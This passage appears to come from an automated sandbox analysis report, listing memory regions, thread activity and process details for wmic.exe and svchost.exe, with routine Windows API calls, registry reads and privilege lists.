pagefile_0x00000000000f0000 0x000f0000 0x000f3fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000000000100000 0x00100000 0x00100fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000000110000 0x00110000 0x00111fff Private Memory Readable, Writable True False False
  • Region Actions
locale.nls 0x00120000 0x001ddfff Memory Mapped File Readable False False False
  • Region Actions
private_0x00000000001e0000 0x001e0000 0x0021ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000220000 0x00220000 0x0022ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000230000 0x00230000 0x0026ffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000000270000 0x00270000 0x00270fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000000280000 0x00280000 0x00283fff Private Memory Readable, Writable True False False
  • Region Actions
msxml3r.dll 0x00290000 0x00290fff Memory Mapped File Readable False False False
  • Region Actions
wmic.exe.mui 0x002a0000 0x002affff Memory Mapped File Readable False False False
  • Region Actions
private_0x00000000002b0000 0x002b0000 0x003affff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000003b0000 0x003b0000 0x003effff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000003b0000 0x003b0000 0x003cffff Private Memory - True False False
  • Region Actions
private_0x00000000003d0000 0x003d0000 0x003d0fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000003e0000 0x003e0000 0x003effff Private Memory Readable, Writable True False False
  • Region Actions
imm32.dll 0x003f0000 0x00419fff Memory Mapped File Readable False False False
  • Region Actions
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000400000 0x00400000 0x0040ffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000000410000 0x00410000 0x00410fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000000000410000 0x00410000 0x00413fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000000000420000 0x00420000 0x00433fff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000440000 0x00440000 0x0044ffff Private Memory Readable, Writable True False False
  • Region Actions
sortdefault.nls 0x00450000 0x00786fff Memory Mapped File Readable False False False
  • Region Actions
ole32.dll 0x00790000 0x00878fff Memory Mapped File Readable False False False
  • Region Actions
private_0x0000000000790000 0x00790000 0x0095ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000790000 0x00790000 0x0094ffff Private Memory Readable, Writable True False False
  • Region Actions
kernelbase.dll.mui 0x00790000 0x0086efff Memory Mapped File Readable False False False
  • Region Actions
pagefile_0x0000000000870000 0x00870000 0x00927fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000000940000 0x00940000 0x0094ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000950000 0x00950000 0x0095ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000960000 0x00960000 0x00b2ffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000000960000 0x00960000 0x00ae7fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000000000af0000 0x00af0000 0x00b13fff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000b20000 0x00b20000 0x00b2ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000b30000 0x00b30000 0x00c2ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000c30000 0x00c30000 0x00c6ffff Private Memory Readable, Writable True False False
  • Region Actions
wmic.exe 0x00c80000 0x00ce3fff Memory Mapped File Readable, Writable, Executable True False False
  • Region Actions
pagefile_0x0000000000cf0000 0x00cf0000 0x04ceffff Pagefile Backed Memory - True False False
  • Region Actions
private_0x0000000004cf0000 0x04cf0000 0x04ebffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000004cf0000 0x04cf0000 0x04e70fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000004eb0000 0x04eb0000 0x04ebffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004ec0000 0x04ec0000 0x052bffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x00000000052c0000 0x052c0000 0x066bffff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x00000000066c0000 0x066c0000 0x066fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000006700000 0x06700000 0x0673ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000006740000 0x06740000 0x0677ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000006780000 0x06780000 0x067bffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000067c0000 0x067c0000 0x067fffff Private Memory Readable, Writable True False False
  • Region Actions
fastprox.dll 0x73010000 0x730cbfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wbemsvc.dll 0x730d0000 0x730e0fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msxml3.dll 0x730f0000 0x7327ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wbemcomn.dll 0x73280000 0x732e5fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wbemprox.dll 0x732f0000 0x732fcfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
framedynos.dll 0x73300000 0x7333efff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
urlmon.dll 0x738a0000 0x739fffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
iertutil.dll 0x73a00000 0x73cc0fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wow64.dll 0x73cd0000 0x73d1efff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wow64cpu.dll 0x73d20000 0x73d27fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wow64win.dll 0x73d30000 0x73da2fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
winnsi.dll 0x73fc0000 0x73fc7fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
iphlpapi.dll 0x73fd0000 0x73ffffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
rsaenh.dll 0x74050000 0x7407efff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
bcrypt.dll 0x74080000 0x7409afff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
cryptsp.dll 0x740a0000 0x740b2fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
dwmapi.dll 0x740c0000 0x740dcfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
uxtheme.dll 0x740e0000 0x74154fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wininet.dll 0x74220000 0x74443fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
apphelp.dll 0x74460000 0x744f0fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
bcryptprimitives.dll 0x74500000 0x74558fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
cryptbase.dll 0x74560000 0x74569fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
sspicli.dll 0x74570000 0x7458dfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernelbase.dll 0x745b0000 0x74725fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
sechost.dll 0x74730000 0x74772fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernel32.dll 0x74780000 0x7486ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msctf.dll 0x748c0000 0x749dffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
combase.dll 0x749e0000 0x74b99fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
rpcrt4.dll 0x74ba0000 0x74c4bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
advapi32.dll 0x74c90000 0x74d0afff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
nsi.dll 0x74f40000 0x74f46fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
shlwapi.dll 0x75100000 0x75143fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
clbcatq.dll 0x75150000 0x751d1fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
shcore.dll 0x75260000 0x752ecfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ws2_32.dll 0x75500000 0x7555bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ole32.dll 0x75560000 0x75649fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernel.appcore.dll 0x75650000 0x7565bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
gdi32.dll 0x75660000 0x757acfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
user32.dll 0x77050000 0x7718ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
imm32.dll 0x771f0000 0x7721afff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
oleaut32.dll 0x77240000 0x772d1fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msvcrt.dll 0x773a0000 0x7745dfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ntdll.dll 0x77460000 0x775d8fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
sysmain.sdb 0x7ee60000 0x7f1effff Memory Mapped File Readable False False False
  • Region Actions
private_0x000000007f1ea000 0x7f1ea000 0x7f1ecfff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007f1ed000 0x7f1ed000 0x7f1effff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x000000007f1f0000 0x7f1f0000 0x7f2effff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x000000007f2f0000 0x7f2f0000 0x7f312fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x000000007f315000 0x7f315000 0x7f317fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007f318000 0x7f318000 0x7f318fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007f319000 0x7f319000 0x7f31bfff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007f31c000 0x7f31c000 0x7f31efff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007f31f000 0x7f31f000 0x7f31ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
  • Region Actions
private_0x000000007fff0000 0x7fff0000 0x7df9ee76ffff Private Memory Readable True False False
  • Region Actions
pagefile_0x00007df9ee770000 0x7df9ee770000 0x7ff9ee76ffff Pagefile Backed Memory - True False False
  • Region Actions
ntdll.dll 0x7ff9ee770000 0x7ff9ee931fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
private_0x00007ff9ee932000 0x7ff9ee932000 0x7ffffffeffff Private Memory Readable True False False
  • Region Actions
Threads
Thread 0x134
(Host: 15, Network: 0)
+
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\syswow64\wbem\wmic.exe, base_address = 0xc80000 True 1
Fn
COM Create interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Computer Name result_out = LHNIWSJ True 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging, data = 48 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging Directory True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging Directory, data = 37 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Log File Max Size, data = 54 True 1
Fn
COM Create interface = 2933BF95-7B36-11D2-B20E-00C04F983E60, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Time type = Local Time, time = 2018-01-26 17:54:14 (Local Time) True 1
Fn
Process #11: svchost.exe
+
Information Value
ID #11
File Name c:\windows\system32\svchost.exe
Command Line C:\Windows\system32\svchost.exe -k netsvcs
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:02:34, Reason: RPC Server
Unmonitor End Time: 00:10:26, Reason: Terminated by Timeout
Monitor Duration 00:07:52
Remarks No high level activity detected in monitored regions
OS Process Information
+
Information Value
PID 0x324
Parent PID 0x1e4 (c:\windows\system32\services.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Groups
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\SERVICE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT SERVICE\BDESVC (ENABLED_BY_DEFAULT, ENABLED, OWNER)
  • NT SERVICE\BITS (ENABLED_BY_DEFAULT, OWNER)
  • NT SERVICE\CertPropSvc (ENABLED_BY_DEFAULT, OWNER)
  • NT SERVICE\DcpSvc (ENABLED_BY_DEFAULT, OWNER)
  • NT SERVICE\dmwappushservice (ENABLED_BY_DEFAULT, OWNER)
  • NT SERVICE\DoSvc (ENABLED_BY_DEFAULT, OWNER)
  • NT SERVICE\DsmSvc (ENABLED_BY_DEFAULT, OWNER)
  • NT SERVICE\EapHost (ENABLED_BY_DEFAULT, OWNER)
  • NT SERVICE\IKEEXT (ENABLED_BY_DEFAULT, OWNER)
  • NT SERVICE\iphlpsvc (ENABLED_BY_DEFAULT, OWNER)
  • NT SERVICE\LanmanServer (ENABLED_BY_DEFAULT, OWNER)
  • NT SERVICE\lfsvc (ENABLED_BY_DEFAULT, OWNER)
  • NT SERVICE\MSiSCSI (ENABLED_BY_DEFAULT, OWNER)
  • NT SERVICE\NcaSvc (ENABLED_BY_DEFAULT, OWNER)
  • NT SERVICE\NetSetupSvc (ENABLED_BY_DEFAULT, OWNER)
  • NT SERVICE\RasAuto (ENABLED_BY_DEFAULT, OWNER)
  • NT SERVICE\RasMan (ENABLED_BY_DEFAULT, OWNER)
  • NT SERVICE\RemoteAccess (ENABLED_BY_DEFAULT, OWNER)
  • NT SERVICE\RetailDemo (ENABLED_BY_DEFAULT, OWNER)
  • NT SERVICE\Schedule (ENABLED_BY_DEFAULT, OWNER)
  • NT SERVICE\SCPolicySvc (ENABLED_BY_DEFAULT, OWNER)
  • NT SERVICE\SENS (ENABLED_BY_DEFAULT, OWNER)
  • NT SERVICE\SessionEnv (ENABLED_BY_DEFAULT, OWNER)
  • NT SERVICE\SharedAccess (ENABLED_BY_DEFAULT, OWNER)
  • NT SERVICE\ShellHWDetection (ENABLED_BY_DEFAULT, OWNER)
  • NT SERVICE\UsoSvc (ENABLED_BY_DEFAULT, OWNER)
  • NT SERVICE\wercplsupport (ENABLED_BY_DEFAULT, OWNER)
  • NT SERVICE\Winmgmt (ENABLED_BY_DEFAULT, OWNER)
  • NT SERVICE\wlidsvc (ENABLED_BY_DEFAULT, OWNER)
  • NT SERVICE\wuauserv (ENABLED_BY_DEFAULT, OWNER)
  • NT SERVICE\XboxNetApiSvc (ENABLED_BY_DEFAULT, OWNER)
  • NT AUTHORITY\Logon Session 00000000:0000b84b (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (ENABLED_BY_DEFAULT, ENABLED, OWNER)
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x BCC
0x BFC
0x BF8
0x BF4
0x 7C4
0x 8F4
0x 8E8
0x 8E0
0x 840
0x 834
0x 724
0x 720
0x 710
0x 25C
0x 70C
0x 708
0x 6FC
0x 6F8
0x 6F0
0x 6E4
0x 6D4
0x 6C8
0x 6C4
0x 6C0
0x 6A4
0x 684
0x 680
0x 67C
0x 674
0x 668
0x 664
0x 65C
0x 658
0x 650
0x 64C
0x 644
0x 63C
0x 628
0x 584
0x 560
0x 558
0x 4F8
0x 4A0
0x 230
0x 144
0x 168
0x 128
0x 124
0x 11C
0x 120
0x 3F8
0x 3F4
0x 3E8
0x 3DC
0x 3D8
0x 3C4
0x 3B4
0x 3A4
0x 32C
0x 328
0x 408
0x 418
0x 68C
0x 470
0x 528
0x 2F0
0x 134
0x 1F4
0x 9F0
0x 84
0x B94
0x 9CC
0x BAC
0x A8C
0x BA8
0x BB4
0x 2E8
0x B68
0x 418
0x 408
0x 270
0x BFC
0x BF8
0x B7C
0x B0
0x 32C
0x 50C
0x 7D8
0x 494
0x 950
0x 338
0x 340
0x 274
0x 808
0x 314
0x 304
0x 744
0x 70C
0x 6F0
0x 64C
0x 6C8
0x 710
0x 6D4
0x 664
0x B38
0x 910
0x 828
0x 80C
0x 9E4
0x 84
0x 528
0x BF8
0x 204
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
  • Region Actions
pagefile_0x0000003f70b80000 0x3f70b80000 0x3f70b8ffff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
svchost.exe.mui 0x3f70b90000 0x3f70b90fff Memory Mapped File Readable False False False
  • Region Actions
pagefile_0x0000003f70ba0000 0x3f70ba0000 0x3f70bb3fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000003f70bc0000 0x3f70bc0000 0x3f70c3ffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000003f70c40000 0x3f70c40000 0x3f70c43fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000003f70c50000 0x3f70c50000 0x3f70c50fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000003f70c60000 0x3f70c60000 0x3f70c61fff Private Memory Readable, Writable True False False
  • Region Actions
locale.nls 0x3f70c70000 0x3f70d2dfff Memory Mapped File Readable False False False
  • Region Actions
private_0x0000003f70d30000 0x3f70d30000 0x3f70daffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f70db0000 0x3f70db0000 0x3f70db0fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f70dc0000 0x3f70dc0000 0x3f70dc6fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f70dd0000 0x3f70dd0000 0x3f70dd0fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f70de0000 0x3f70de0000 0x3f70de6fff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000003f70df0000 0x3f70df0000 0x3f70df0fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000003f70e00000 0x3f70e00000 0x3f70efffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f70f00000 0x3f70f00000 0x3f70ffffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000003f71000000 0x3f71000000 0x3f71187fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000003f71190000 0x3f71190000 0x3f71310fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000003f71320000 0x3f71320000 0x3f713dffff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000003f713e0000 0x3f713e0000 0x3f714dffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f714e0000 0x3f714e0000 0x3f715dffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000003f715e0000 0x3f715e0000 0x3f715e0fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000003f715f0000 0x3f715f0000 0x3f715f1fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000003f71600000 0x3f71600000 0x3f71600fff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000003f71610000 0x3f71610000 0x3f71611fff Pagefile Backed Memory Readable True False False
  • Region Actions
gpsvc.dll.mui 0x3f71620000 0x3f7162cfff Memory Mapped File Readable False False False
  • Region Actions
cversions.2.db 0x3f71630000 0x3f71633fff Memory Mapped File Readable True False False
  • Region Actions
cversions.2.db 0x3f71640000 0x3f71643fff Memory Mapped File Readable True False False
  • Region Actions
private_0x0000003f71650000 0x3f71650000 0x3f71656fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f71660000 0x3f71660000 0x3f71666fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f71670000 0x3f71670000 0x3f716effff Private Memory Readable, Writable True False False
  • Region Actions
iphlpsvc.dll.mui 0x3f716f0000 0x3f716fcfff Memory Mapped File Readable False False False
  • Region Actions
private_0x0000003f71700000 0x3f71700000 0x3f717fffff Private Memory Readable, Writable True False False
  • Region Actions
sortdefault.nls 0x3f71800000 0x3f71b36fff Memory Mapped File Readable False False False
  • Region Actions
private_0x0000003f71b40000 0x3f71b40000 0x3f71c3ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f71c40000 0x3f71c40000 0x3f71d3ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f71d40000 0x3f71d40000 0x3f71e3ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f71e40000 0x3f71e40000 0x3f71f3ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f71f40000 0x3f71f40000 0x3f7203ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f72040000 0x3f72040000 0x3f720bffff Private Memory Readable, Writable True False False
  • Region Actions
propsys.dll.mui 0x3f720c0000 0x3f720d0fff Memory Mapped File Readable False False False
  • Region Actions
vsstrace.dll.mui 0x3f720e0000 0x3f720e8fff Memory Mapped File Readable False False False
  • Region Actions
pagefile_0x0000003f720f0000 0x3f720f0000 0x3f720f0fff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f72100000 0x3f72100000 0x3f721fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f72200000 0x3f72200000 0x3f722fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f72380000 0x3f72380000 0x3f723fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f72400000 0x3f72400000 0x3f724fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f72500000 0x3f72500000 0x3f725fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f72600000 0x3f72600000 0x3f7267ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f72680000 0x3f72680000 0x3f7277ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f72780000 0x3f72780000 0x3f727fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f72800000 0x3f72800000 0x3f728fffff Private Memory Readable, Writable True False False
  • Region Actions
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000007.db 0x3f72900000 0x3f72942fff Memory Mapped File Readable True False False
  • Region Actions
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db 0x3f72950000 0x3f729dafff Memory Mapped File Readable True False False
  • Region Actions
private_0x0000003f729e0000 0x3f729e0000 0x3f72adffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f72ae0000 0x3f72ae0000 0x3f72b5ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f72b60000 0x3f72b60000 0x3f72c5ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f72c60000 0x3f72c60000 0x3f72d5ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f72d60000 0x3f72d60000 0x3f72e5ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f72e60000 0x3f72e60000 0x3f72edffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f72ee0000 0x3f72ee0000 0x3f72f5ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f72f60000 0x3f72f60000 0x3f72fdffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f72fe0000 0x3f72fe0000 0x3f7305ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f73060000 0x3f73060000 0x3f730dffff Private Memory Readable, Writable True False False
  • Region Actions
activeds.dll.mui 0x3f730e0000 0x3f730e1fff Memory Mapped File Readable False False False
  • Region Actions
pagefile_0x0000003f730f0000 0x3f730f0000 0x3f730f0fff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f73100000 0x3f73100000 0x3f731fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f73200000 0x3f73200000 0x3f732fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f73300000 0x3f73300000 0x3f7337ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f73380000 0x3f73380000 0x3f73386fff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000003f73390000 0x3f73390000 0x3f7348ffff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f73490000 0x3f73490000 0x3f7350ffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000003f73510000 0x3f73510000 0x3f73512fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000003f73520000 0x3f73520000 0x3f73520fff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
winnlsres.dll 0x3f73530000 0x3f73534fff Memory Mapped File Readable False False False
  • Region Actions
private_0x0000003f73540000 0x3f73540000 0x3f73546fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f73550000 0x3f73550000 0x3f7364ffff Private Memory Readable, Writable True False False
  • Region Actions
winnlsres.dll.mui 0x3f73650000 0x3f7365ffff Memory Mapped File Readable False False False
  • Region Actions
mswsock.dll.mui 0x3f73660000 0x3f73662fff Memory Mapped File Readable False False False
  • Region Actions
private_0x0000003f73690000 0x3f73690000 0x3f73696fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f736a0000 0x3f736a0000 0x3f736a6fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f736b0000 0x3f736b0000 0x3f737affff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f737b0000 0x3f737b0000 0x3f7382ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f73830000 0x3f73830000 0x3f7392ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f73930000 0x3f73930000 0x3f739affff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f739b0000 0x3f739b0000 0x3f73aaffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f73ab0000 0x3f73ab0000 0x3f73b2ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f73b30000 0x3f73b30000 0x3f73c2ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f73c30000 0x3f73c30000 0x3f73d2ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f73d30000 0x3f73d30000 0x3f73e2ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f73e30000 0x3f73e30000 0x3f73f2ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f73f30000 0x3f73f30000 0x3f7402ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f74030000 0x3f74030000 0x3f7412ffff Private Memory Readable, Writable True False False
  • Region Actions
kernelbase.dll.mui 0x3f74130000 0x3f7420efff Memory Mapped File Readable False False False
  • Region Actions
private_0x0000003f74210000 0x3f74210000 0x3f74216fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f74220000 0x3f74220000 0x3f7431ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f74320000 0x3f74320000 0x3f7439ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f74400000 0x3f74400000 0x3f744fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f74500000 0x3f74500000 0x3f745fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f74600000 0x3f74600000 0x3f746fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f74700000 0x3f74700000 0x3f747fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f74800000 0x3f74800000 0x3f748fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f74900000 0x3f74900000 0x3f749fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f74a00000 0x3f74a00000 0x3f74afffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f74b00000 0x3f74b00000 0x3f74bfffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f74c00000 0x3f74c00000 0x3f74cfffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f74d00000 0x3f74d00000 0x3f74dfffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f74e00000 0x3f74e00000 0x3f74efffff Private Memory Readable, Writable True False False
